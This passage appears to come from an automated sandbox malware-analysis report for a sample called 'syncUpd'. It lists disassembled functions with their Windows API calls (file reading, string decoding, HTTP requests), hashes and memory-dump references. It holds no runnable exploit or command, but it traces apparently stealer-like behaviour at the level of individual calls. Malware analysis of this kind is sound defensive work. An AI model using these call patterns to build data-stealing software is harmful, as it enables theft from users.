                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,0041E0DC,00000000,?,006248EC,00000000,?,00624AE4,00000000,?,0041E0D8), ref: 008F5D85
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 008F5D96
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 008F5DA7
                                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 008F5DAE
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 008F5DC3
                                                                                                                                                                                                                                                              • memcpy.MSVCRT ref: 008F5DDA
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 008F5DEC
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 008F5E05
                                                                                                                                                                                                                                                              • memcpy.MSVCRT ref: 008F5E12
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?), ref: 008F5E2F
                                                                                                                                                                                                                                                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 008F5E43
                                                                                                                                                                                                                                                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 008F5E60
                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 008F5EC4
                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 008F5ED1
                                                                                                                                                                                                                                                              • HttpOpenRequestA.WININET(00000000,00624C84,?,00624AB0,00000000,00000000,00400100,00000000), ref: 008F5B0F
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrlen.KERNEL32(?,006249EC,?,004215A4,0041D7D6), ref: 0090722C
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcpy.KERNEL32(00000000), ref: 0090726B
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcat.KERNEL32(00000000,00000000), ref: 00907279
                                                                                                                                                                                                                                                                • Part of subcall function 00907107: lstrcpy.KERNEL32(?,0041D7D6), ref: 0090716C
                                                                                                                                                                                                                                                                • Part of subcall function 00907187: lstrcpy.KERNEL32(00000000,?), ref: 009071D9
                                                                                                                                                                                                                                                                • Part of subcall function 00907187: lstrcat.KERNEL32(00000000), ref: 009071E9
                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 008F5EDB
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocateConnectCrackFileProcessReadSend
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 36004537-0
                                                                                                                                                                                                                                                              • Opcode ID: 8b814884cedf4fc81417a9552fa435a5da42abb82068080e2803263974605ad5
                                                                                                                                                                                                                                                              • Instruction ID: 8890a41f367e191af8af4bc5806cb1252b008577fbae0a557c1fc3a96a11f615
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8b814884cedf4fc81417a9552fa435a5da42abb82068080e2803263974605ad5
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FA12B776D18118AECB25EBA0DC95FEEB379BF94710F104299B106A21D1EF706A49CF90
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 0040C100 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 383filestringCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00964580,00000000,?,0041DBAC,00000000,?,?), ref: 0040C1D6
                                                                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040C1F3
                                                                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C1FF
                                                                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040C212
                                                                                                                                                                                                                                                                • Part of subcall function 00414FF0: malloc.MSVCRT ref: 00414FF8
                                                                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040C242
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(?,00964550,0041D72E), ref: 0040C260
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,00964478), ref: 0040C287
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(?,00965088,00000000,?,0041DBB8,00000000,?,00000000,00000000,?,0095DB50,00000000,?,0041DBB4,00000000,?), ref: 0040C405
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,00965248), ref: 0040C41C
                                                                                                                                                                                                                                                                • Part of subcall function 0040BF90: memset.MSVCRT ref: 0040BFC3
                                                                                                                                                                                                                                                                • Part of subcall function 0040BF90: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,0095DA40), ref: 0040BFE1
                                                                                                                                                                                                                                                                • Part of subcall function 0040BF90: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040BFEC
                                                                                                                                                                                                                                                                • Part of subcall function 0040BF90: memcpy.MSVCRT ref: 0040C082
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(?,00965248,00000000,?,0041DBBC,00000000,?,00000000,0095DA40), ref: 0040C4BD
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,0095DB00), ref: 0040C4D4
                                                                                                                                                                                                                                                                • Part of subcall function 0040BF90: lstrcat.KERNEL32(?,0041D726), ref: 0040C0B3
                                                                                                                                                                                                                                                                • Part of subcall function 0040BF90: lstrcat.KERNEL32(?,0041D727), ref: 0040C0C7
                                                                                                                                                                                                                                                                • Part of subcall function 0040BF90: lstrcat.KERNEL32(?,0041D72A), ref: 0040C0E8
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040C5A7
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040C5F9
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeStringmallocmemcpymemset
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3538457421-3916222277
                                                                                                                                                                                                                                                              • Opcode ID: 364726a44b4d57385a88c1b79dec0d19187e46a99b31c25e2210e1e06496a6b8
                                                                                                                                                                                                                                                              • Instruction ID: 16cc530deb27457f536659a64f134916331f5af867ee6c6bf2a367595298ef92
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 364726a44b4d57385a88c1b79dec0d19187e46a99b31c25e2210e1e06496a6b8
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 66E11075910208ABCB14EBA1DC91FEEBB79BF54304F41415EF10667191DF38AA86CFA8
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 008FC367 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 383filestringCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00906FA7: lstrcpy.KERNEL32(0041D7D6,00000000), ref: 00906FEF
                                                                                                                                                                                                                                                                • Part of subcall function 00907187: lstrcpy.KERNEL32(00000000,?), ref: 009071D9
                                                                                                                                                                                                                                                                • Part of subcall function 00907187: lstrcat.KERNEL32(00000000), ref: 009071E9
                                                                                                                                                                                                                                                                • Part of subcall function 00907107: lstrcpy.KERNEL32(?,0041D7D6), ref: 0090716C
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrlen.KERNEL32(?,006249EC,?,004215A4,0041D7D6), ref: 0090722C
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcpy.KERNEL32(00000000), ref: 0090726B
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcat.KERNEL32(00000000,00000000), ref: 00907279
                                                                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00624E08,00000000,?,0041DBAC,00000000,?,?), ref: 008FC43D
                                                                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 008FC45A
                                                                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 008FC466
                                                                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 008FC479
                                                                                                                                                                                                                                                                • Part of subcall function 00905257: malloc.MSVCRT ref: 0090525F
                                                                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 008FC4A9
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(?,006249AC,0041D72E), ref: 008FC4C7
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,00624B58), ref: 008FC4EE
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(?,00624CB4,00000000,?,0041DBB8,00000000,?,00000000,00000000,?,00624958,00000000,?,0041DBB4,00000000,?), ref: 008FC66C
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,00624CB0), ref: 008FC683
                                                                                                                                                                                                                                                                • Part of subcall function 008FC1F7: memset.MSVCRT ref: 008FC22A
                                                                                                                                                                                                                                                                • Part of subcall function 008FC1F7: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 008FC248
                                                                                                                                                                                                                                                                • Part of subcall function 008FC1F7: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 008FC253
                                                                                                                                                                                                                                                                • Part of subcall function 008FC1F7: memcpy.MSVCRT ref: 008FC2E9
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(?,00624CB0,00000000,?,0041DBBC,00000000,?,00000000,006248DC), ref: 008FC724
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,00624D8C), ref: 008FC73B
                                                                                                                                                                                                                                                                • Part of subcall function 008FC1F7: lstrcat.KERNEL32(?,0041D726), ref: 008FC31A
                                                                                                                                                                                                                                                                • Part of subcall function 008FC1F7: lstrcat.KERNEL32(?,0041D727), ref: 008FC32E
                                                                                                                                                                                                                                                                • Part of subcall function 008FC1F7: lstrcat.KERNEL32(?,0041D72A), ref: 008FC34F
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 008FC80E
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 008FC860
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeStringmallocmemcpymemset
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3538457421-3916222277
                                                                                                                                                                                                                                                              • Opcode ID: a45be58c568c268844c13b048b7103b6ab608b1b555d09365ef61c6c6f9f6565
                                                                                                                                                                                                                                                              • Instruction ID: 3aa2deda98678f36f1f14c4f0d76b33e8ca4cf2d154e96bcdc2a1a43d0454ec4
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a45be58c568c268844c13b048b7103b6ab608b1b555d09365ef61c6c6f9f6565
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BAE1B572D08108AECB15EBE4DCA2FEEB779BF94714F004159F116A61D1EE707A49CBA0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 0040FAE0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 145stringCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ExitProcessstrtok_s
                                                                                                                                                                                                                                                              • String ID: block
                                                                                                                                                                                                                                                              • API String ID: 3407564107-2199623458
                                                                                                                                                                                                                                                              • Opcode ID: 41a2138b3896e42c9869aa3857ee75ea4af1dee36dc7dfe2c37fe0af47d4e35f
                                                                                                                                                                                                                                                              • Instruction ID: 7825bcbe27da9618b603611e1cfecd621835b499ad6dca7fa43ef563d7fd58f0
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 41a2138b3896e42c9869aa3857ee75ea4af1dee36dc7dfe2c37fe0af47d4e35f
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F514074A08209EFDB20DFA1D955BAE77B5BF44305F10807AE802B76C0D778E985CB59
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 0040F630 Relevance: 19.8, APIs: 13, Instructions: 298stringCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 0040F667
                                                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 0040FA8F
                                                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,0095C850,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: strtok_s$lstrcpylstrlen
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 348468850-0
                                                                                                                                                                                                                                                              • Opcode ID: 246b1aff9b8c562c0644f65958cb50fd17ea9c4d234438f75cd93a71321f9b47
                                                                                                                                                                                                                                                              • Instruction ID: 2b3dd8003c7db60ae6f20250f168b485c10b0cdbdb2f80ad8031a0e3e82ebbeb
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 246b1aff9b8c562c0644f65958cb50fd17ea9c4d234438f75cd93a71321f9b47
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B4C1A7B5900619DBCB24EF60DC89FDA7779AF58304F00459EE40DA7191DB34AAC9CFA8
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00411F30 Relevance: 19.7, APIs: 13, Instructions: 193stringCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00411F4E
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00411F65
                                                                                                                                                                                                                                                                • Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 00411F9C
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00964928), ref: 00411FBB
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 00411FCF
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,009645B0), ref: 00411FE3
                                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                • Part of subcall function 00415490: GetFileAttributesA.KERNEL32(00000000,?,0040E9F4,?,00000000,?,00000000,0041D76E,0041D76B), ref: 0041549F
                                                                                                                                                                                                                                                                • Part of subcall function 004096C0: StrStrA.SHLWAPI(00000000,00964490), ref: 0040971B
                                                                                                                                                                                                                                                                • Part of subcall function 004096C0: memcmp.MSVCRT ref: 00409774
                                                                                                                                                                                                                                                                • Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
                                                                                                                                                                                                                                                                • Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
                                                                                                                                                                                                                                                                • Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
                                                                                                                                                                                                                                                                • Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
                                                                                                                                                                                                                                                                • Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
                                                                                                                                                                                                                                                                • Part of subcall function 004093A0: CloseHandle.KERNEL32(000000FF), ref: 0040947A
                                                                                                                                                                                                                                                                • Part of subcall function 00415AC0: GlobalAlloc.KERNEL32(00000000,00412087,00412087), ref: 00415AD3
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(?,00964A18), ref: 0041209D
                                                                                                                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 00412199
                                                                                                                                                                                                                                                                • Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 004094CF
                                                                                                                                                                                                                                                                • Part of subcall function 004094A0: LocalAlloc.KERNEL32(00000040,?,?,?,00404BAE,00000000,?), ref: 004094E1
                                                                                                                                                                                                                                                                • Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 0040950A
                                                                                                                                                                                                                                                                • Part of subcall function 004094A0: LocalFree.KERNEL32(?,?,?,?,00404BAE,00000000,?), ref: 0040951F
                                                                                                                                                                                                                                                                • Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
                                                                                                                                                                                                                                                                • Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
                                                                                                                                                                                                                                                                • Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0041212A
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041D4AB,?,?,?,?,000003E8), ref: 00412147
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 00412159
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000,?), ref: 0041216C
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000,0041D840), ref: 0041217B
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcat$Local$AllocFile$Freememset$BinaryCryptGlobalStringmemcmp$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1812951797-0
                                                                                                                                                                                                                                                              • Opcode ID: 2112dc93db2e9c7d23ebf7cc232fb71577f599c64b2531fd4971e86fd3ff8236
                                                                                                                                                                                                                                                              • Instruction ID: d5c3215e2bd1f08faed5fb03d7604f0585b4cbbeb5c4b7daf79ee1030fe867fa
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2112dc93db2e9c7d23ebf7cc232fb71577f599c64b2531fd4971e86fd3ff8236
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B97158B6900618BBCB24EBE0DD49FDE7779AF88304F004599F60997181EA78DB94CF94
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00902197 Relevance: 19.7, APIs: 13, Instructions: 193stringCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 009021B5
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 009021CC
                                                                                                                                                                                                                                                                • Part of subcall function 00905747: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00905772
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 00902203
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00624B00), ref: 00902222
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 00902236
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00624DAC), ref: 0090224A
                                                                                                                                                                                                                                                                • Part of subcall function 00906FA7: lstrcpy.KERNEL32(0041D7D6,00000000), ref: 00906FEF
                                                                                                                                                                                                                                                                • Part of subcall function 009056F7: GetFileAttributesA.KERNEL32(00000000,?,008F1CAB,?,?,004215E4,?,?,0041D7E2), ref: 00905706
                                                                                                                                                                                                                                                                • Part of subcall function 008F9927: StrStrA.SHLWAPI(00000000,006248E8), ref: 008F9982
                                                                                                                                                                                                                                                                • Part of subcall function 008F9927: memcmp.MSVCRT ref: 008F99DB
                                                                                                                                                                                                                                                                • Part of subcall function 008F9607: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008F9633
                                                                                                                                                                                                                                                                • Part of subcall function 008F9607: GetFileSizeEx.KERNEL32(000000FF,?), ref: 008F9658
                                                                                                                                                                                                                                                                • Part of subcall function 008F9607: LocalAlloc.KERNEL32(00000040,?), ref: 008F9678
                                                                                                                                                                                                                                                                • Part of subcall function 008F9607: ReadFile.KERNEL32(000000FF,?,00000000,008F16B6,00000000), ref: 008F96A1
                                                                                                                                                                                                                                                                • Part of subcall function 008F9607: LocalFree.KERNEL32(008F16B6), ref: 008F96D7
                                                                                                                                                                                                                                                                • Part of subcall function 008F9607: CloseHandle.KERNEL32(000000FF), ref: 008F96E1
                                                                                                                                                                                                                                                                • Part of subcall function 00905D27: GlobalAlloc.KERNEL32(00000000,009022EE,009022EE), ref: 00905D3A
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(?,006248D8), ref: 00902304
                                                                                                                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 00902400
                                                                                                                                                                                                                                                                • Part of subcall function 008F9707: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,008F4E15,00000000,00000000), ref: 008F9736
                                                                                                                                                                                                                                                                • Part of subcall function 008F9707: LocalAlloc.KERNEL32(00000040,?,?,?,008F4E15,00000000,?), ref: 008F9748
                                                                                                                                                                                                                                                                • Part of subcall function 008F9707: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,008F4E15,00000000,00000000), ref: 008F9771
                                                                                                                                                                                                                                                                • Part of subcall function 008F9707: LocalFree.KERNEL32(?,?,?,?,008F4E15,00000000,?), ref: 008F9786
                                                                                                                                                                                                                                                                • Part of subcall function 008F9A57: memcmp.MSVCRT ref: 008F9A72
                                                                                                                                                                                                                                                                • Part of subcall function 008F9A57: memset.MSVCRT ref: 008F9AA5
                                                                                                                                                                                                                                                                • Part of subcall function 008F9A57: LocalAlloc.KERNEL32(00000040,?), ref: 008F9AF5
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 00902391
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041D4AB,?,?,?,?,000003E8), ref: 009023AE
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 009023C0
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000,?), ref: 009023D3
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000,0041D840), ref: 009023E2
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
